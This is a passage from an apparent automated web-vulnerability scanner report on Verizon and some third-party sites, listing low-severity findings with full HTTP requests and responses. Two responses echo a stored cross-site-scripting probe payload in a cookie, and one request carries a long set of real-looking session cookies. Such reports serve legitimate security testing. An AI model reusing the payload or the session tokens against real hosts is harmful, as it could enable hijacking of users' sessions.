Connection: close

<headtags><script language='javascript'>var GlobalHeaderId='GlobalHeader';</script>
<script>var masterClientID ='GlobalHeader';</script>
<script language='javascript' src='/content/commonfiles/include
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTMzOTk0NjYxMGRk" />
...[SNIP]...

9.7. http://www22.verizon.com/residentialhelp/inhomeagent

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /residentialhelp/inhomeagent

Request

GET /residentialhelp/inhomeagent HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 215655
Expires: Mon, 05 Sep 2011 22:37:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:37:25 GMT
Connection: close
Set-Cookie: ECSPCookies=Partner=VZO&SolutionCenter=InHomeAgent&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=110ed<script>prompt("StoredXSS")</script>af81f92fd39; expires=Wed, 05-Sep-2012 22:37:25 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/l
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKMTQ4MTQ2OTAzNGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgIFN2N0bDAwJENvbnRlbnRQbGFjZUhvbGRlcjEkVmlld2FibGVQcmlvcml0eTEkY2hrVmlld2FibGUFOWN0bDAwJENvbnRlbnRQbGFjZUhvbGRlcjEkVmlld2FibGVQcmlvcml0eTEkY2hrU2VhcmNoYWJsZQ==" />
...[SNIP]...

9.8. http://www22.verizon.com/residentialhelp/inhomeagent/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /residentialhelp/inhomeagent/

Request

GET /residentialhelp/inhomeagent/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 215661
Expires: Mon, 05 Sep 2011 22:37:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:37:25 GMT
Connection: close
Set-Cookie: ECSPCookies=Partner=VZO&SolutionCenter=InHomeAgent&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=110ed<script>prompt("StoredXSS")</script>af81f92fd39; expires=Wed, 05-Sep-2012 22:37:25 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/l
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKMTQ4MTQ2OTAzNGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgIFN2N0bDAwJENvbnRlbnRQbGFjZUhvbGRlcjEkVmlld2FibGVQcmlvcml0eTEkY2hrVmlld2FibGUFOWN0bDAwJENvbnRlbnRQbGFjZUhvbGRlcjEkVmlld2FibGVQcmlvcml0eTEkY2hrU2VhcmNoYWJsZQ==" />
...[SNIP]...

9.9. http://www22.verizon.com/residentialhelp/usercontrols/SendEmail.aspx

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /residentialhelp/usercontrols/SendEmail.aspx

Request

GET /residentialhelp/usercontrols/SendEmail.aspx HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 16625
Expires: Mon, 05 Sep 2011 22:37:23 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:37:23 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<html xmlns:vz>
   <head>
       <title>Send Email</title>
       <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
       
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTE3MjE1ODM2OTcPZBYCAgEPZBYCAgMPZBYCAgEPZBYCAgEPEGRkFgBkGAIFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYDBQxjaGtFbWFpbENvcHkFCGJ0blNlbmQyBQdidG5TZW5kBQ5JbWFnZVZlcmlmaWVyMQ8PZAUYbmN4bXRzZW9tM2hnM2g0NTQyY2MwYzU1ZA==" />
...[SNIP]...

9.10. https://www22.verizon.com/FORYOURSMALLBIZ/GOFLOW/NATIONALBUNDLES/NBUNDLEQUALIFY.ASPX

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /FORYOURSMALLBIZ/GOFLOW/NATIONALBUNDLES/NBUNDLEQUALIFY.ASPX

Request

GET /FORYOURSMALLBIZ/GOFLOW/NATIONALBUNDLES/NBUNDLEQUALIFY.ASPX?CLIENT=RGA&CUSTTYPE=NEW&SMBBANNERID=ND~LECLS+3YR+1V HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: http://smallbusiness.verizon.com/products/voice/plans.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; CMS_TimeZoneOffset=300; PDSS=PflowId=680d1ca400d842e69be1848a9f3d28c5; DSS=flowId=f9688e84baaa4126acd87151b526b588; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; ContextInfo_TV=FiOSTV; ECSPCookies=Partner=VZO&SolutionCenter=FiOSTV&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=; IHAClientIP=112.64.2.103; 
RecentlyVisited=Verizon%2520%257C%2520FiOS%2520TV@http%253A//www22.verizon.com/residentialhelp/fiostv%23Verizon%2520%257C%2520-%2520How%2520do%2520I%2520use%2520Ask%2520Verizon%253F@http%253A//www22.verizon.com/ResidentialHelp/Generic/Ask%252520Verizon/Getting%252520Started/124519.htm%23; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=VwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxAA==&IP=NQAwAC4AMgAzAC4AMQAyADMALgAxADAANgAsACAAOAAwAC4ANgA3AC4ANwA0AC4AMgAxADEALAAgADEAMQAyAC4ANgA0AC4AMQAuADEAMAA3AA==; vzinhomeagent=GUID=OQAwADQAMgAzAGQAMAA1AC0ANwA3ADAAMgAtADQANwAzAGUALQBhAGQAMAA3AC0ANQA3AGMAYwBkADUAYgAyAGMAMQA0ADYA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMQA3ADgAMQA2ADMAOQA5ADwALwBUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4A&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIAUwBUAEIARgByAG8AegBlAG4A&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIAUwBUAEIARgByAG8AegBlAG4APAAvAFQAZQB4AHQAPgA8AC8AVQBzAGUAcgBUAGUAeAB0AD4A&AccountIDAuthMode=bgBvAA==; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc65945525d5f4f58455e445a4a423660; WT_FPC=id=27bb86d4bd1c3b1dd581315275882795:lv=1315275882795:ss=1315275882795; vzapps=ZIPCODE=10010; BPSPANISH=N; CP=null*; refURL=https://www22.verizon.com/ForYourHome/VZRepair/vziha/Service.aspx?ihaweb=WebSTBFrozen; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d; urlreferer=http://smallbusiness.verizon.com/products/voice/plans.aspx; NSC_xxx22_gztncja_80_mcw=ffffffff895bc6ba45525d5f4f58455e445a4a423660

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 54820
Expires: Mon, 05 Sep 2011 22:25:39 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:25:39 GMT
Connection: keep-alive
Set-Cookie: GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; domain=.verizon.com; path=/
Set-Cookie: SrcClientID=smallbusiness.verizon.com; path=/; secure; HttpOnly


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Verizon | Shop for Services | TV + Internet + Phone</title>


...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKMTYyMDA0NDM3NGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgQFCldpbmJhY2tfQ0IFDWltZ05leHRCdXR0b24FCUNoZWNrYm94MQUFYWZidG4=" />
...[SNIP]...

9.11. https://www22.verizon.com/ForYourHome/GoFlow/MyVerizonNew/ACSLogin.aspx

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /ForYourHome/GoFlow/MyVerizonNew/ACSLogin.aspx

Request

GET /ForYourHome/GoFlow/MyVerizonNew/ACSLogin.aspx HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 31774
Expires: Mon, 05 Sep 2011 22:38:01 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:38:01 GMT
Connection: close
Set-Cookie: EOrdering=AffinityCaptcha=NES6zYkqZVIXZHz3xATrXzO2Q%3d%3d&STEP133=NESJBAz%2b%2bFRFcSze8KcWPLg9w%3d%3d&PROJNORTH-CLIENT=; domain=.verizon.com; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
   <title>Verizon | Shop for Services | TV + Internet + Phone</title>
   <meta na
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKMTAzMTg2ODMxNmQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFBWFmYnRu" />
...[SNIP]...

10. Cookie without HttpOnly flag set
There are 152 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



10.1. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal707d3(a)c76e008a5a1/smb

Summary

Severity:   Low
Confidence:   Firm
Host:   http://business.verizon.net
Path:   /SMBPortalWeb/appmanager/SMBPortal707d3(a)c76e008a5a1/smb

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /SMBPortalWeb/appmanager/SMBPortal707d3(a)c76e008a5a1/smb HTTP/1.1
Host: business.verizon.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 81
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Expires: Mon, 05 Sep 2011 22:35:47 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 05 Sep 2011 22:35:47 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: SaasSessionID=6HwvTlTDDDqxbJHQylhDzp1qy40cPyFnn5JkYgDhB2FQrR0Dm7d2!1058537351; path=/
Set-Cookie: AkaUTrackingID=CCA5CE7F785A7866A11942A8BCDFE833; expires=Sat, 08-Sep-2018 22:35:47 GMT; path=/; domain=verizon.net
Set-Cookie: AkaSTrackingID=F03373E721508DB1B1034D461D039B58; path=/; domain=verizon.net

Resource /SMBPortal707d3(a)c76e008a5a1/smb could not be resolved for locale null.

10.2. http://community.adobe.com/help/rm/sugg.html

Summary

Severity:   Low
Confidence:   Firm
Host:   http://community.adobe.com
Path:   /help/rm/sugg.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /help/rm/sugg.html HTTP/1.1
Host: community.adobe.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:34:46 GMT
Set-Cookie: ach-locale=en_US; Domain=adobe.com; Expires=Wed, 05-Oct-2011 22:34:46 GMT; Path=/
Set-Cookie: JSESSIONID=EA8C3A95144AB975FDABE9CB1FAE425B; Path=/help
Pragma: public
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 05 Sep 2011 22:34:46 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: pre-check=0, post-check=0, max-age=0
Pragma: no-cache
Expires: 0
Content-Type: text/xml;charset=UTF-8
Content-Length: 204
Vary: Accept-Encoding
Connection: close

<?xml version="1.0" encoding="utf-8"?>


<ion ver="1.0"><hl>en_US</hl><error severity="error" errorCode="MISSING_ARGUMENT" method="ach.search.sugg">One of required parameters is missing q</error></io
...[SNIP]...

10.3. https://login.verizonwireless.com/amserver/saml2/jsp/idpSSOInit.jsp

Summary

Severity:   Low
Confidence:   Firm
Host:   https://login.verizonwireless.com
Path:   /amserver/saml2/jsp/idpSSOInit.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /amserver/saml2/jsp/idpSSOInit.jsp HTTP/1.1
Host: login.verizonwireless.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 400 Identity Provider ID is null.
Server: VZW
Date: Mon, 05 Sep 2011 22:35:06 GMT
Connection: close
Cache-control: no-cache
Pragma: no-cache
Set-cookie: JSESSIONID=89A59939130D388D7849198CE10F65BE; Path=/amserver
Content-type: text/html
Content-length: 6496

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en-us" xml:lang="en-us">
<head>

...[SNIP]...

10.4. http://sales.liveperson.net/visitor/addons/deploy.asp

Summary

Severity:   Low
Confidence:   Firm
Host:   http://sales.liveperson.net
Path:   /visitor/addons/deploy.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /visitor/addons/deploy.asp?site=2329305&d_id=undefined HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.verizonbusiness.com/Medium/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315261001562

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:16:46 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Last-Modified: Tue, 14 Jul 2009 13:04:47 GMT
Content-Length: 2123
Content-Type: application/x-javascript
Set-Cookie: ASPSESSIONIDQCBDACQS=GFHBJLKAIMBKKNPIJLELBFCD; path=/
Cache-control: public, max-age=3600, s-maxage=3600

//Plugins for site 2329305
lpAddMonitorTag();
typeof lpMTagConfig!="undefined"&&function(a){lpMTagConfig.isMobile=!1;if(/android|avantgo|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hon
...[SNIP]...

10.5. http://sales.liveperson.net/visitor/addons/deploy.asp

Summary

Severity:   Low
Confidence:   Firm
Host:   http://sales.liveperson.net
Path:   /visitor/addons/deploy.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /visitor/addons/deploy.asp?site=2329305&d_id=undefined HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.verizonbusiness.com/Medium/sign-in/vec/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=5110247826455,d=1314795678; ASPSESSIONIDQSBSDQDT=AHDPIJCABMFOAADKOLJOBFBJ; HumanClickACTIVE=1315261045786
If-Modified-Since: Tue, 14 Jul 2009 13:04:47 GMT

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:17:59 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Last-Modified: Tue, 14 Jul 2009 13:04:47 GMT
Content-Length: 2123
Content-Type: application/x-javascript
Set-Cookie: ASPSESSIONIDSCCAASQT=PGKOLLOAKCMLGBBEGDEEFLGE; path=/
Cache-control: public, max-age=3600, s-maxage=3600

//Plugins for site 2329305
lpAddMonitorTag();
typeof lpMTagConfig!="undefined"&&function(a){lpMTagConfig.isMobile=!1;if(/android|avantgo|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hon
...[SNIP]...

10.6. http://sales.liveperson.net/visitor/addons/deploy.asp

Summary

Severity:   Low
Confidence:   Firm
Host:   http://sales.liveperson.net
Path:   /visitor/addons/deploy.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /visitor/addons/deploy.asp HTTP/1.1
Host: sales.liveperson.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Mon, 05 Sep 2011 22:35:37 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Length: 424
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCQQTCTSA=HLKAPFHCLMLFMHDAOAJLLEPA; path=/
Cache-control: private

//Plugins for site
<font face="Arial" size=2>
<p>Server.MapPath()</font> <font face="Arial" size=2>error 'ASP 0174 : 80004005'</font>
<p>
<font face="Arial" size=2>Invalid Path Character(s)</font>

...[SNIP]...

10.7. https://secure.opinionlab.com/ccc01/comment_card_json_4_0_b.asp

Summary

Severity:   Low
Confidence:   Firm
Host:   https://secure.opinionlab.com
Path:   /ccc01/comment_card_json_4_0_b.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ccc01/comment_card_json_4_0_b.asp HTTP/1.1
Host: secure.opinionlab.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 8154
Content-Type: text/html; Charset=UTF-8
Cool01: Opinionlab - Cool01
Set-Cookie: ASPSESSIONIDAAAQCDSR=CBJOPHDCDACKEPKDCCMHHGPC; path=/
Date: Mon, 05 Sep 2011 22:35:41 GMT
Connection: close

<!--TEMPLATE version 3.6 UNIVERSAL CSS ON PAGE b: 0 ...--><html>
<head>
<META http-equiv="Content-Type" content="text/html; charset=UTF-16">
<base href="https://secure.opinionlab.com/ccc01">
<titl
...[SNIP]...

10.8. http://www.verizonwireless.com/b2c/index.html

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.verizonwireless.com
Path:   /b2c/index.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /b2c/index.html HTTP/1.1
Host: www.verizonwireless.com
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/content/verizonglobalhome/ghp_landing.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Mon, 05 Sep 2011 22:15:38 GMT
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 17 Sept 2000 12:00:00 GMT
Set-Cookie: GLOBALID=JHPrv0rWj7yocbPko%2BHLF8zqOnD3%2FSV22d7pwWM5O%2FNFRQcl%2By5AJJhaVp3nPNUb; domain=.verizonwireless.com; expires=Tuesday, 04-Sep-2012 22:15:38 GMT; path=/
Set-Cookie: JSESSIONIDB2C=jZvNTlKK9hnVQLQqjRF12BK92hhyybvqCRTpT2bzvwXHMhjVwyJn!1237649322!elton!5102!-1; path=/
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: NSC_xxx_xmt_c2d_mcwt=ffffffff09f6572d45525d5f4f58455e445a4a4225de;path=/;httponly
Set-Cookie: NSC_xxx_hwt=ffffffff8ab44cd945525d5f4f58455e445a4a420000;path=/;httponly
Content-Length: 32484

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


           <html xmlns="http://www.w3.org/1999/xhtml" lang="en-us" xml:lang="
...[SNIP]...

10.9. http://www22.verizon.com/content/verizonglobalhome/gpromo.aspx

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www22.verizon.com
Path:   /content/verizonglobalhome/gpromo.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/verizonglobalhome/gpromo.aspx HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 16461
Expires: Mon, 05 Sep 2011 22:37:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:37:10 GMT
Connection: close
Set-Cookie: GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; expires=Sun, 04-Dec-2011 23:37:10 GMT; path=/
Set-Cookie: HBXInitialVisit=Y; domain=.verizon.com; path=/

   
<div class="marquee_selector_bubble sprite sprite_marquee_bubble"></div>
                        <table class="marquee_selectors"><tr><td>
                       
                        <UL><LI><A class="marquee_selector
...[SNIP]...

10.10. https://www22.verizon.com/content/verizonglobalhome/gpromo.aspx

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www22.verizon.com
Path:   /content/verizonglobalhome/gpromo.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/verizonglobalhome/gpromo.aspx HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 16461
Expires: Mon, 05 Sep 2011 22:37:54 GMT
Cache-Control: max-age=0, no-cache, no-store
